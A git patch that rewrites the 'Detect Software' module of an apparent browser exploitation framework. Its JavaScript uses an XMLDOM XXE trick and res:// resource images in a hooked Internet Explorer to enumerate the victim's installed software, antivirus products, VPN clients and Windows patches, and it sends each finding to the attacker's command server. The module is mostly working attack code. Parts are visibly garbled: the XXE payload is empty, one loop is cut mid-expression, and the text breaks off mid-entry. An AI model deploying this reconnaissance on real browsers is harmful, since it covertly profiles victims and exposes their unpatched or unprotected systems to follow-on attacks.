From 683937419977c9e80b93a34e946ef1c3fce54127 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 9 Apr 2017 17:19:20 +0000
Subject: [PATCH] Replace Detect Software module
---
modules/host/detect_software/command.js | 832 +++++++++++++++++++----
modules/host/detect_software/config.yaml | 9 +-
modules/host/detect_software/module.rb | 8 +-
3 files changed, 692 insertions(+), 157 deletions(-)
diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js
index f02352772..8c473beae 100644
--- a/modules/host/detect_software/command.js
+++ b/modules/host/detect_software/command.js
@@ -6,157 +6,689 @@ beef.execute(function() { - var files = [ - "Adobe/Reader 9.0/Reader/Tracker/add_reviewer.gif", - "NetWaiting/Logon.bmp", - "Windows NT/Pinball/table.bmp", - "InterVideo/WinDVD/Skins/WinDVD 5/Audio SRS Subpanel/Audio_SRS_Subpanel_Base_Mask.bmp", - "Java/jre1.6.0_02/lib/images/cursors/invalid32x32.gif", - "Common Files/Roxio Shared/9.0/Tutorial/Graphics/archive.gif", - "Windows Sidebar/Gadgets/Weather.Gadget/images/1px.gif", - "Pinnacle/Shared Files/Pixie/Register/hdr_register_1.gif", - "Adobe/Reader 8.0/Reader/BeyondReader/ENU/Onramp/acrobat.gif", - "eFax Messenger 4.3/Media/ENU/confidential.gif", - "InterActual/InterActual Player/help/images/btm_bckg.gif", - "Intuit/QuickBooks 2007/Components/Help/Updates/bolt.gif", - "Java/jre1.5.0_11/lib/images/cursors/win32_CopyDrop32x32.gif", - "Macromedia/Flash 8/en/First Run/HelpPanel/_sharedassets/check.gif", - "Microsoft Dynamics CRM/Client/res/web/_imgs/configure.gif", - "Microsoft Office/Live Meeting 8/Console/Playback/Engine/img/dropdown-arrow.gif", - "Microsoft Visual Studio 8/Common7/IDE/VBExpress/ProjectTemplatesCache/1033/MovieCollection.zip/Documentation/images/side-vb.gif", - "Mozilla Firefox/res/broken-image.gif", - "Mozilla Thunderbird/res/grabber.gif", - "TechSmith/SnagIt 9/HTML_Content/add-in.gif", - "VMware/VMware Player/help/images/collapse.gif", - "WildPackets/OmniPeek Personal/1033/Html/expert-red-yellow-on.gif", - "FreeMind/accessories/hide.png", - "HP/Digital Imaging/Skins/oov1/bc/img/bc-backLogo.png", - "Movie Maker/Shared/news.png", - "MySQL/MySQL Tools for 5.0/images/grt/db/column.png", - "Safari/Safari.resources/compass.png", - "ThinkVantage Fingerprint Software/rsc/logon.png", - "Trillian/plugins/GoodNews/icons/logo.png", - "Trillian/users/default/cache/account-AIM-offline.png", - "VideoLAN/VLC/http/images/delete.png", - "Virtual Earth 3D/Data/Atmosphere.png", - "Windows Media Connect 2/wmc_bw120.png", - "Analog Devices/SoundMAX/CPApp.ico", - "AT&T/Communication 
Manager/desktop.ico", - "ATI Technologies/ATI.ACE/branding.ico", - "Canon/ZoomBrowser EX/Program/CIGLibDisplayIcon.ico", - "CDBurnerXP Pro 3/Resources/cdbxp.ico", - "DivX/divxdotcom.ico", - "Fiddler/IE_Toolbar.ico", - "HP/SwfScan/SwfScan.ico", - "iPhone Configuration Utility/Document-Config.ico", - "Microsoft Device Emulator/1.0/emulator.ico", - "MSN/MSNCoreFiles/Install/msnms.ico", - "OpenVPN/openvpn.ico", - "Paros/paros_logo.ico", - "Adobe/Photoshop 6.0/Help/images/banner.jpg", - "iTunes/iTunes.Resources/genre-blues.jpg", - "Source Insight 3/images/SubBack.jpg", - "Canon/CameraWindow/MyCameraFiles/VI_JPG/XMAS22_VI01.JPG", - "Microsoft Office/OFFICE11/REFBAR.ICO", - "Microsoft Office/OFFICE12/REFBAR.ICO", - "Windows Media Player/Network Sharing/wmpnss_color48.jpg", - ] - var descriptions = [ - "Adobe Reader 9.0", - "WinDVD", - "Windows Pinball", - "Conexant NetWaiting", - "JRE 1.6.0_22", - "Roxio 9.0", - "Windows Weather Gadget", - "Pinnacle", - "Adobe Reader 8.0", - "eFax Manager 4.0", - "Interactual Player", - "Quickbooks", - "JRE 1.5.0_11", - "Flash 8", - "Microsoft CRM", - "Microsoft Live Meeting 8", - "Microsoft Visual Studio 8", - "Mozilla Firefox", - "Mozilla Thunderbird", - "Snagit 9", - "VMware Player", - "Omnipeek Personal", - "Freemind", - "HP Digital Imaging", - "Windows Movie Maker", - "MySQL Tools for 5.0", - "Safari", - "ThinkVantage Fingerprint Software", - "Trillian Plugin GoodNews", - "Trillian", - "VideoLAN VLC", - "Microsoft Virtial Earth 3D", - "Windows Media Connect 2", - "SoundMAX", - "AT&T Communications Manager", - "ATI Technologies ATI.ACE", - "Canon ZoomBrowser", - "CDBurnerXP Pro 3", - "DivX", - "Fiddler", - "HP's SwfScan", - "iPhone Configuration Utility", - "Microsoft Device Emulator", - "MSN", - "OpenVPN", - "Paros", - "Adobe Photoshop 6.0", - "iTunes", - "Source Insight 3", - "Canon CameraWindow", - "Microsoft Office 11", - "Microsoft Office 12", - "Windows Media Player" - ] - - if (navigator.appName != "Microsoft Internet 
Explorer") { - result = 'Software detection module only works in IE (so far)'; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result); - - // Using IE lets test for smb enum - } else { - var pic1 = new Image(); - pic1.src= "file:///\\127.0.0.1/C$/WINDOWS/system32/ntimage.gif"; - var pic2 = new Image(); - pic2.src= "file:///\\127.0.0.1/C$/Windows/Web/Wallpaper/img1.jpg"; + if (!("ActiveXObject" in window)) { + beef.debug('[Detect Software] Unspported browser'); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error()); + return false; + } - if (pic1.width == 28 && pic2.width == 28) { - result = 'SMB method of detecting software failed'; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result); - - // smb enum is working lets look for installed software - } else { - result = ''; - var sixtyfourbitvista = 0; - for (var x = 0; x < files.length; x++) { - var pic1 = new Image(); - pic1.src= "file:///\\127.0.0.1/C$/Program Files/" + files[x]; - - if (pic1.width != 28) { - result += descriptions[x]; - result += ' and '; - - } else { - pic1.src= "file:///\\127.0.0.1/C$/Program Files (x86)/" + files[x]; - if (pic1.width != 28) { - result += descriptions[x]; - result += ' and '; + var drive = 'C'; + var win_dir = 'WINDOWS'; + var program_dirs = ['Program Files', 'Program Files (x86)']; + var xmldom_supported = false; - sixtyfourbitvista = 1; - } - } - } - - beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result); - } + function detect_folder(path) { + var dtd = 'res://' + path; + var xml = ''; + var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); + xmlDoc.async = true; + try { + xmlDoc.loadXML(xml); + return false; + } catch (e) { + return true; } - + } + + // Test XMLDOM XXE technique + for (var i = 0; i < program_dirs.length; i++) { + var path = drive + ":\\" + program_dirs[i]; + var result = detect_folder(path); + if (result) { + 
xmldom_supported = true; + break; + } + } + + // Detect software using XMLDOM XXE technique + var software = [ + ['7zip', '7-Zip'], + ['Acoustica MP3 Audio Mixer', 'Acoustica MP3 Audio Mixer'], + ['Autodesk AutoCAD 2015', 'Autodesk\\AutoCAD 2015'], + ['Autodesk AutoCAD 2016', 'Autodesk\\AutoCAD 2016'], + ['Adobe Help', 'Adobe\\Adobe Help Viewer'], + ['Adobe Professional 7', 'Adobe\\Acrobat 7.0'], + ['Adobe Reader 7', 'Adobe\\Reader 7.0\\Reader'], + ['Adobe Reader 8', 'Adobe\\Reader 8.0\\Reader'], + ['Adobe Reader 9', 'Adobe\\Reader 9.0\\Reader'], + ['Adobe Reader 10', 'Adobe\\Reader 10.0\\Reader'], + ['Adobe Reader 11', 'Adobe\\Reader 11.0\\Reader'], + ['Ahead Nero', 'ahead'], + ['AirPcap', 'Riverbed\\AirPcap'], + ['Apple Software Update', 'Apple Software Update'], + ['Azureus', 'azureus'], + ['Baidu', 'baidu'], + ['BitComet', 'BitComet'], + ['BitSpirit', 'BitSpirit'], + ['BioExplorer', 'BioExplorer'], + ['Cisco Prime Data Center Network Manager', 'Cisco Systems\\dcm'], + ['Citrix', 'Citrix'], + ['DbVisualizer', 'DbVisualizer'], + ['eMule', 'eMule'], + ['eMule', 'easyMule2'], + ['Flash MX 2004', 'Macromedia\\Flash MX 2004'], + ['Flashget', 'FlashGet'], + ['Flashget 3', 'FlashGet Network\\FlashGet 3'], + ['FoxIt Reader', 'Foxit Software'], + ['FoxIt Reader', 'Foxit Reader'], + ['Free Nokia Ringtone Converter', 'Free Nokia Ringtone Converter'], + ['Git', 'Git'], + ['Gnome Music Player Client', 'Gnome Music Player Client'], + ['GnuPG', 'GNU\\GnuPG'], + ['Heroku', 'Heroku'], + ['HP AutoPass License Server', 'HP\\HP AutoPass License Server'], + ['HP TRIM', 'Hewlett-Packard\\HP TRIM'], + ['IceWeasel', 'IceWeasel'], + ['IncredibleCharts', 'IncredibleCharts'], + ['Internet Explorer', 'Internet Explorer'], + ['iTunes', 'iTunes'], + ['Java JRE 6', 'Java\\jre6'], + ['Java JRE 7', 'Java\\jre7'], + ['Java JRE 8', 'Java\\jre8'], + ['JetBrains dotPeek', 'JetBrains\\dotPeek'], + ['Juniper Network Connect 8.1', 'Juniper Networks\\Network Connect 8.1'], + ['JXplorer', 'jxplorer'], + 
['Lexmark Markvision Enterprise', 'Lexmark\\Markvision Enterprise'], + ['Magellan MapSend Lite', 'Magellan\MapSend Lite'], + ['Microsoft Baseline Security Analyzer 2', 'Microsoft Baseline Security Analyzer 2'], + ['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7'], + ['Microsoft SQL Server', 'Microsoft SQL Server'], + ['Microsoft SQL Server Compact Edition', 'Microsoft SQL Server Compact Edition'], + ['Microsoft Virtual PC', 'Microsoft Virtual PC'], + ['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8'], + ['Microsoft Visual Studio 9', 'Microsoft Visual Studio 9'], + ['Microsoft Visual Studio 10', 'Microsoft Visual Studio 10'], + ['Microsoft Visual Studio 11', 'Microsoft Visual Studio 11'], + ['Microsoft Visual Studio 12', 'Microsoft Visual Studio 12'], + ['mIRC', 'mIRC'], + ['Mozilla Firefox', 'Mozilla Firefox'], + ['MSN Messenger', 'Messenger'], + ['NipperStudio', 'NipperStudio'], + ['KeePass Password Safe 2', 'KeePass Password Safe 2'], + ['NetBeans 8.1', 'NetBeans 8.1'], + ['NeuroServer', 'NeuroServer'], + ['Nokia PC Suite', 'Nokia\\Connectivity Cable Driver'], + ['Notepad Plus Plus', 'Notepad++'], + ['Opera', 'Opera'], + ['Oracle JavaFX 2.0 Runtime', 'Oracle\\JavaFX 2.0 Runtime'], + ['Outlook Express', 'Outlook Express'], + ['Paritech Pulse', 'Paritech\\Pulse'], + ['PGP Desktop', 'PGP Corporation\\PGP Desktop'], + ['Picasa2', 'picasa2'], + ['Proxifier', 'Proxifier'], + ['QuickTime', 'QuickTime'], + ['QLogic SANsurfer', 'QLogic Corporation\SANsurfer'], + ['radmin', 'Radmin'], + ['Real VNC4', 'RealVNC\\VNC4'], + ['RedGate .NET Reflector', 'Red Gate\\.NET Reflector'], + ['Resource Hacker', 'Resource Hacker'], + ['Safari', 'Safari'], + ['SeaMonkey', 'SeaMonkey'], + ['SiteKiosk', 'SiteKiosk'], + ['Spark', 'Spark'], + ['TeamSpeak 3 Client', 'TeamSpeak 3 Client'], + ['TinaSoft Easy Cafe Server', 'TinaSoft\\Easy Cafe Server'], + ['Trend Micro Deep Security Manager', 'Trend Micro\\Deep Security Manager'], + ['TrueCrypt', 'TrueCrypt'], + ['TopShare 
Portfolio Manager v2', 'TopShare Portfolio Manager V2'], + ['Samsung USB Drivers for Mobile Phones', 'SAMSUNG\\USB Drivers'], + ['Secure CRT', 'SecureCRT'], + ['Serv—U', 'RhinoSoft.com\\Serv—U'], + ['Skype', 'Skype\\Phone'], + ['SoapUI 5.0.0', 'SmartBear\\SoapUI-5.0.0'], + ['Thunder', 'Thunder Network\\Thunder'], + ['Thunder', 'Thunder Network\\Thunder6'], + ['Tencent QQDownload', 'Tencent\\QQDownload'], + ['VLC', 'VideoLAN\\VLC'], + ['Ultramon', 'ultramon\\ultramondesktop.exe'], + ['Unreal Media Server', 'UnrealStreaming\\UMediaServer'], + ['uTorrent', 'uTorrent'], + ['VMware Workstation', 'vmware\\vmware workstation'], + ['VMware Tools', 'VMware\\VMware Tools'], + ['VMware Workstation', 'VMware\\VMware Workstation'], + ['VirtualBox Guest Additions', 'Oracle\\VirtualBox Guest Additions'], + ['Winamp', 'winamp'], + ['Windows DVD Maker', 'DVD Maker'], + ['Windows Journal', 'Windows Journal'], + ['Windows Media Player', 'Windows Media Player'], + ['Windows Mail', 'Windows Mail'], + ['Windows Movie Maker', 'Movie Maker'], + ['Windows NetMeeting', 'NetMeeting'], + ['Windows Photo Viewer', 'Windows Photo Viewer'], + ['WinHex', 'WinHex'], + ['WinRAR', 'WinRAR'], + ['WinZip', 'WinZip'], + ['Wireshark', 'Wireshark'], + ['WinPcap', 'WinPcap'], + ['WinSCP', 'WinSCP'], + ['XFire', 'xfire'], + ['Xming', 'Xming X Server'], + ['Yahoo Messenger', 'Yahoo!\\Messenger'], + + // AntiVirus + ['360Safe', '360\\360Safe'], + ['360Safe', '360Safe'], + ['A-Squared Anti-Malware', 'A-Squared Anti-Malware'], + ['Agnitum Outpost Security Suite Pro', 'Agnitum\\Outpost Security Suite Pro'], + ['AhnLab', 'AhnLab'], + ['ESET Smart Security', 'ESET\\ESET Smart Security'], + ['ESTsoft ALYac Internet Security', 'ESTsoft\\ALYac'], + ['AhnLab', 'AhnLab\\Smart Update Utility'], + ['AhnLab V3 Internet Security Lite', 'AhnLab\\V3Lite'], + ['Avast AntiVirus 4', 'Alwil Software\\Avast4'], + ['Avast AntiVirus', 'AVAST Software\\Avast'], + ['AVG 2012', 'AVG\\AVG2012'], + ['AVG', 'AVG Secure Search'], + 
['Avira AntiVir Desktop', 'Avira\\AntiVir Desktop'], + ['Avira AntiVir Personal Edition', 'Avira\\AntiVir PersonalEdition Classic'], + ['BitDefender', 'BitDefender'], + ['DrWeb AntiVirus', 'DrWeb'], + ['eScan AntiVirus', 'eScan'], + ['F-Secure ExploitShield', 'F-Secure\\ExploitShield'], + ['F-Secure Internet Security', 'F-Secure Internet Security\\FSPS'], + ['F-PROT Antivirus', 'FRISK Software\\F-PROT Antivirus for Windows'], + ['Kaspersky Internet Security 2012', 'Kaspersky Lab\\Kaspersky Internet Security 2012'], + ['Kaspersky Anti-Virus 2009', 'Kaspersky Lab\\Kaspersky Anti-Virus 2009'], + ['Kaspersky Anti-Virus 2010', 'Kaspersky Lab\\Kaspersky Anti-Virus 2010'], + ['Kaspersky Anti-Virus 2011', 'Kaspersky Lab\\Kaspersky Anti-Virus 2011'], + ['Kaspersky Anti-Virus 2012', 'Kaspersky Lab\\Kaspersky Anti-Virus 2012'], + ['Kaspersky Anti-Virus 2013', 'Kaspersky Lab\\Kaspersky Anti-Virus 2013'], + ['Kaspersky Anti-Virus 2014', 'Kaspersky Lab\\Kaspersky Anti-Virus 2014'], + ['Kaspersky Endpoint Security 8', 'Kaspersky Lab\\Kaspersky Endpoint Security 8 for Windows'], + ['Kaspersky Internet Security 2010', 'Kaspersky Lab\\Kaspersky Internet Security 2010'], + ['Kaspersky Internet Security 2009', 'Kaspersky Lab\\Kaspersky Internet Security 2009'], + ['Kingsoft AntiVirus', 'KingSoft\\kingsoft antivirus'], + ['IKARUS anti.virus', 'IKARUS\\anti.virus'], + ['Immunet AntiVirus', 'Immunet'], + ['JiangMin AntiVirus', 'JiangMin\\AntiVirus'], + ['Micropoint AntiVirus', 'Micropoint'], + ['Microsoft EMET 4.1', 'EMET 4.1'], + ['Microsoft EMET 5.0', 'EMET 5.0'], + ['McAfee Total Protection 2011', 'McAfeeMOBK'], + ['McAfee Enterprise', 'McAfee\\VirusScan Enterprise'], + ['McAfee Security Center', 'McAfee\\MSC'], + ['Norman Scan Engine', 'Norman\\Nse'], + ['Norton Internet Security', 'Norton Internet Security'], + ['Norton AntiVirus', 'Norton AntiVirus'], + ['nProtect Anti-Virus Spyware 3.0', 'INCAInternet\\nProtect Anti-Virus Spyware 3.0'], + ['PC Tools Antivirus Software', 'PC Tools 
Antivirus Software'], + ['Quick Heal Total Security', 'Quick Heal\\Quick Heal Total Security'], + ['Sucop Antivirus', 'Sucop\\SecPlugin'], + ['Rising AntiVirus', 'Rising\\RAV'], + ['Rising AntiVirus', 'Rising\\RIS'], + ['Rising Firewall', 'Rising\\RFW'], + ['Sunbelt Software Personal Firewall', 'Sunbelt Software\\Personal Firewall'], + ['Sophos Sophos Anti-Virus', 'Sophos\\Sophos Anti-Virus'], + ['Sophos Client Firewall', 'Sophos\\Sophos Client Firewall'], + ['SUPERAntiSpyware', 'SUPERAntiSpyware'], + ['Symantec Endpoint Protection', 'Symantec\\Symantec Endpoint Protection'], + ['Symantec Antivirus', 'symantec_client_security\\symantec antivirus'], + ['Trend Micro Internet Security', 'Trend Micro\\Internet Security'], + ['Trend Micro OfficeScan Client', 'Trend Micro\\OfficeScan Client'], + ['VirusBuster', 'VirusBuster'], + ['Windows Defender', 'Windows Defender'], + ['ZoneAlarm', 'Zone Labs\\ZoneAlarm'], + + // Office + ['Microsoft Office', 'Microsoft Office\\OFFICE'], + ['Microsoft Office 10', 'Microsoft Office\\OFFICE10'], + ['Microsoft Office 11', 'Microsoft Office\\OFFICE11'], + ['Microsoft Office 12', 'Microsoft Office\\OFFICE12'], + ['Microsoft Office 13', 'Microsoft Office\\OFFICE13'], + ['Microsoft Office 14', 'Microsoft Office\\OFFICE14'], + ['WPS Office', 'Kingsoft\\Kingsoft Office'], + ['WPS Office Personal', 'Kingsoft\\WPS Office Personal'], + ['WPS Office 2008', 'Kingsoft\\WPS Office 2008'], + ['WPS Office 2009', 'Kingsoft\\WPS Office 2009'], + ['WPS Office 2010', 'Kingsoft\\WPS Office 2010'], + + // Security + ['Cain', 'Cain'], + ['Echo Mirage', 'Echo Mirage'], + ['Fiddler2', 'Fiddler2'], + ['L0pht Crack 5', '@stake\\LC5'], + ['Immunity Debugger', 'Immunity Inc\\Immunity Debugger'], + ['Network Miner v2.1', 'NetworkMiner_2-1'], + ['Nmap', 'nmap'], + + // VPN + ['Checkpoint Endpoint Connect', 'Checkpoint\\Endpoint Connect'], + ['Cisco AnyConnect Secure Mobility Client', 'Cisco AnyConnect Secure Mobility Client'], + ['Cisco AnyConnect VPN Client', 
'Cisco AnyConnect VPN Client'], + ['Fortinet FortiClient', 'Fortinet\\FortiClient'], + ['OpenVPN', 'OpenVPN'] + ]; + + if (xmldom_supported) { + beef.debug('[Detect Software] Enumerating software...'); + for (var i = 0; i < program_dirs.length; i++) { + for (var j = 0; j < software.length; j++) { + var path = drive + ":\\" + program_dirs[i] + "\\" + software[j][1]; + var result = detect_folder(path); + if (result) { + beef.debug('[Detect Software] Found software: ' + path); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + software[j][0]); + } + } + } + } + + // Enumerate patches (Win XP only) + var patches = [ + 'KB2570947', + 'KB2584146', + 'KB2585542', + 'KB2592799', + 'KB2598479', + 'KB2603381', + 'KB2619339', + 'KB2620712', + 'KB2631813', + 'KB2653956', + 'KB2655992', + 'KB2659262', + 'KB2661637', + 'KB2676562', + 'KB2686509', + 'KB2691442', + 'KB2698365', + 'KB2705219-v2', + 'KB2712808', + 'KB2719985', + 'KB2723135-v2', + 'KB2727528', + 'KB2749655', + 'KB2757638', + 'KB2770660', + 'KB2780091', + 'KB2802968', + 'KB2803821-v2_WM9', + 'KB2807986', + 'KB2813345', + 'KB2820917', + 'KB2834886', + 'KB2847311', + 'KB2850869', + 'KB2859537', + 'KB2862152', + 'KB2862330', + 'KB2862335', + 'KB2864063', + 'KB2868038', + 'KB2868626', + 'KB2876217', + 'KB2876331', + 'KB2892075', + 'KB2893294', + 'KB2898715', + 'KB2900986', + 'KB2904266', + 'KB2909212', + 'KB2914368', + 'KB2916036', + 'KB2922229', + 'KB2929961', + 'KB2930275', + 'KB2934207', + 'KB2936068', + 'KB2964358', + 'KB898461', + 'KB923561', + 'KB946648', + 'KB950762', + 'KB950974', + 'KB951376-v2', + 'KB951978', + 'KB952004', + 'KB952069_WM9', + 'KB952287', + 'KB952954', + 'KB953155', + 'KB954155_WM9', + 'KB955759', + 'KB956572', + 'KB956844', + 'KB959426', + 'KB960803', + 'KB960859', + 'KB961118', + 'KB968389', + 'KB969059', + 'KB970430', + 'KB970483', + 'KB971029', + 'KB971657', + 'KB972270', + 'KB973507', + 'KB973540_WM9', + 'KB973815', + 'KB973869', + 'KB973904', + 'KB974112', + 
'KB974318', + 'KB974392', + 'KB974571', + 'KB975025', + 'KB975467', + 'KB975558_WM8', + 'KB975560', + 'KB975713', + 'KB976323', + 'KB977816', + 'KB977914', + 'KB978338', + 'KB978542', + 'KB978695_WM9', + 'KB978706', + 'KB979309', + 'KB979482', + 'KB979687', + 'KB981997', + 'KB982132', + 'KB982665' + ]; + + if (xmldom_supported) { + beef.debug("[Detect Software] Enumerating installed patches..."); + for (var i = 0; i < patches.length; i++) { + var path = drive + ":\\" + win_dir + "\\$NtUninstall" + patches[i] + "$"; + var result = detect_folder(path); + if (result) { + beef.debug('[Detect Software] Found patch: ' + path); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + patches[i]); + } + } + } + + // Skip software detection using 'res' scheme and EXE/DLL resource images + // if XMLDOM XXE technique worked + if (xmldom_supported) return; + + + + // Detect software using 'res' scheme and EXE/DLL resource images + var dom = beef.dom.createInvisibleIframe(); + + // Enumerate patches (Win XP only) + var patches = [ + ["KB2964358", "mshtml.dll/2/2030"], // MS14-021 + ["KB2936068", "mshtmled.dll/2/2503"], // MS14-018 + ["KB2864063", "themeui.dll/2/120"], // MS13-071 + ["KB2859537", "ntkrpamp.exe/2/1"], // MS13-063 + ["KB2813345", "mstscax.dll/2/101"], // MS13-029 + ["KB2820917", "winsrv.dll/#2/#512"], // MS13-033 + ["KB2691442", "shell32.dll/2/130"], // MS12-048 + ["KB2676562", "ntkrpamp.exe/2/1"], // MS12-034 + ["KB2506212", "mfc42.dll/#2/#26567"], // MS11-024 + ["KB2483185", "shell32.dll/2/130"], // MS11-006 + ["KB2481109", "mstsc.exe/#2/#620"], // MS11-017 + ["KB2443105", "isign32.dll/2/#101"], // MS10-097 + ["KB2393802", "ntkrnlpa.exe/2/#1"], // MS11-011 + ["KB2387149", "mfc40.dll/#2/#26567"], // MS10-074 + ["KB2296011", "comctl32.dll/#2/#120"], // MS10-081 + ["KB979687", "wordpad.exe/#2/#131"], // MS10-083 + ["KB978706", "mspaint.exe/#2/#102"], // MS10-005 + ["KB977914", "iyuv_32.dll/2/INDEOLOGO"], // MS10-013 + ["KB973869", 
"dhtmled.ocx/#2/#1"] // MS09-037 + ]; + + beef.debug("[Detect Software] Enumerating installed patches..."); + for (var i=0; i", <%= @command_id %>, "installed_patches=" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + + // Enumerate software + var software = [ + ["7zip", "7-Zip\\7zFM.exe/2/2002"], + ["Adobe Help", "Adobe\\Adobe Help Viewer\\1.0\\ahv.exe/#2/#132"], + ["Baidu", "baidu\\Baidu Hi\\BaiduHi.exe/#2/#152"], + ["Cain", "Cain\\UNWISE.EXE/2/106"], + ["Echo Mirage", "Echo Mirage\\unins000.exe/2/DISKIMAGE"], + ["FoxIt Reader", "Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/257"], + ["FoxIt Reader", "Foxit Reader\\Foxit Reader.exe/#2/#484"], + ["Internet Explorer", "Internet Explorer\\iedvtool.dll/2/4000"], + ["Outlook Express", "Outlook Express\\msoeres.dll/2/1"], + ["KeePass Password Safe 2", "KeePass Password Safe 2\\unins000.exe/2/DISKIMAGE"], + ["Nokia PC Suite", "Nokia\\Connectivity Cable Driver\\nmwcdcocls.dll/2/131"], + ["Notepad Plus Plus", "Notepad++\\uninstall.exe/2/110"], + ["OpenVPN", "OpenVPN\\Uninstall.exe/2/110"], + ["Oracle JavaFX 2.0 Runtime", "Oracle\\JavaFX 2.0 Runtime\\bin\\eula.dll/2/204"], + ["Resource Hacker", "Resource Hacker\\ResHacker.exe/2/128"], + ["Samsung USB Drivers for Mobile Phones", "SAMSUNG\\USB Drivers\\Uninstall.exe/2/132"], + ["Tencent QQDownload", "Tencent\\QQDownload\\QQDownload.exe/2/132"], + ["QuickTime", "QuickTime\\QTinfo.exe/2/101"], + ["QuickTime", "QuickTime\\quicktimeplayer.exe/#2/#403"], + ["VLC", "VideoLAN\\VLC\\npvlc.dll/2/3"], + ["Immunity Debugger", "Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe/2/GOTO"], + ["Java JRE 6", "Java\\jre6\\bin\\awt.dll/2/CHECK_BITMAP"], + ["Java JRE 7", "Java\\jre7\\bin\\awt.dll/2/CHECK_BITMAP"], + ["Java JRE 8", "Java\\jre8\\bin\\awt.dll/2/CHECK_BITMAP"], + ["VMware Tools", "VMware\\VMware Tools\\TPVCGatewaydeu.dll/2/30994"], + ["VMware Tools", "VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/30995"], 
+ ["VMware Workstation", "VMware\\VMware Workstation\\vmplayer.exe/#2/5"], + ["VMware Workstation", "VMware\\VMware Workstation\\vmware.exe/#2/#508"], + ["VirtualBox Guest Additions", "Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/110"], + ["Windows DVD Maker", "DVD Maker\\DVDMaker.exe/2/438"], + ["Windows Journal", "Windows Journal\\Journal.exe/2/112"], + ["Windows Mail", "Windows Mail\\msoeres.dll/2/1"], + ["Windows Movie Maker", "Movie Maker\\wmm2res.dll/2/201"], + ["Windows NetMeeting", "NetMeeting\\nmchat.dll/2/207"], + ["Windows Photo Viewer", "Windows Photo Viewer\\PhotoViewer.dll/2/#51209"], + ["WinRAR", "WinRAR\\WinRAR.exe/#2/#150"], + ["Microsoft Virtual PC", "Microsoft Virtual PC\\Virtual PC.exe/#2/150"], + ["Wireshark", "Wireshark\\uninstall.exe/2/110"], + + // AntiVirus software + ["360Safe", '360\\360Safe\\360leakfixer.exe/#2/110'], + ["360Safe", '360\\360Safe\\repairleakdll.dll/GIF/154'], + ["360Safe", '360Safe\\live.dll/#2/#203'], + ["360Safe", '360\\360safe\\360Safe.exe/2/131'], + ["ESTsoft ALYac Internet Security", 'ESTsoft\\ALYac\\AYUpdate.aye/2/30994'], + ["AhnLab", 'AhnLab\\Smart Update Utility\\SUpdate.exe/2/153'], + ["AhnLab V3 Internet Security Lite", 'AhnLab\\V3Lite\\V3LTray.exe/2/132'], + ["Avast AntiVirus 4", 'Alwil Software\\Avast4\\ashAvast.exe/2/267'], + ["Avast AntiVirus", 'AVAST Software\\Avast\\aswAra.dll/#2/101'], + ["AVG 2012", 'AVG\\AVG2012\\avguires.dll/#2/111'], + ["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\ccquarc.dll/#2/101'], + ["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\setup.dll/#2/132'], + ["Avira AntiVir Personal Edition", 'Avira\\AntiVir PersonalEdition Classic\\setup.dll/#2/#132'], + ["DrWeb AntiVirus", 'DrWeb\\spideragent.exe/#2/133'], + ["Kaspersky Internet Security 2012", 'Kaspersky Lab\\Kaspersky Internet Security 2012\\basegui.ppl/#2'], + ["Kaspersky Anti-Virus 2009", 'Kaspersky Lab\\Kaspersky Anti-Virus 2009\\oeas.dll/2/206'], + ["Kaspersky Anti-Virus 2010", 'Kaspersky Lab\\Kaspersky Anti-Virus 
2010\\shellex.dll/2/103'], + ["Kaspersky Internet Security 2010", 'Kaspersky Lab\\Kaspersky Internet Security 2010\\shellex.dll/2/103'], + ["Kaspersky Internet Security 2009", 'Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206'], + ["Kingsoft AntiVirus", 'KingSoft\\kingsoft antivirus\\kislive.exe/#2/102'], + ["Rising AntiVirus", 'Rising\\RAV\\RavUsb.exe/#2/112'], + ["Rising AntiVirus", 'Rising\\Ris\\SetUp.exe/2/147'], + ["ESET Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/#2/1070'], + ["JiangMin AntiVirus", 'JiangMin\\AntiVirus\\VirusBox.exe/#2/128'], + ["JiangMin AntiVirus", 'JiangMin\\Install\\KVOL.exe/2/202'], + ["Micropoint AntiVirus", 'Micropoint\\mfc90.dll/#2/30994'], + ["McAfee Total Protection 2011", 'McAfeeMOBK\\BootStrap.exe/#2/30994'], + ["McAfee Enterprise", 'McAfee\\VirusScan Enterprise\\graphics.dll/2/202'], + ["McAfee Security Center", 'McAfee\\MSC\\mclgview.exe/2/129'], + ["Norton Internet Security 16.0.0.125", 'Norton Internet Security\\Engine\\16.0.0.125\\SymSHAx9.dll/2/102'], + ["Norton Internet Security 16.5.0.135", 'Norton Internet Security\\Engine\\16.5.0.135\\SymSHAx9.dll/2/102'], + ["Norton AntiVirus 17.5.0.127", 'Norton AntiVirus\\MUI\\17.5.0.127\\images\\cssbase.dll/2/SCANTASKWZ_SCAN_ITEM_LIST.BMP'], + ["NOD32 Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/2/1070'], + ["Trend Micro Internet Security", 'Trend Micro\\Internet Security\\UfSeAgnt.exe/2/30994'], + ["Trend Micro OfficeScan Client", 'Trend Micro\\OfficeScan Client\\PcNTMon.exe/2/30994'], + ["Sucop Antivirus", 'Sucop\\SecPlugin\\SecPlugin.dll/#2/211'], + ["Sophos Client Firewall", 'Sophos\\Sophos Client Firewall\\logo_rc.dll/2/114'], + ["Symantec Endpoint Protection", 'Symantec\\LiveUpdate\\AUPDATE.exe/2/129'], + ["ZoneAlarm", 'Zone 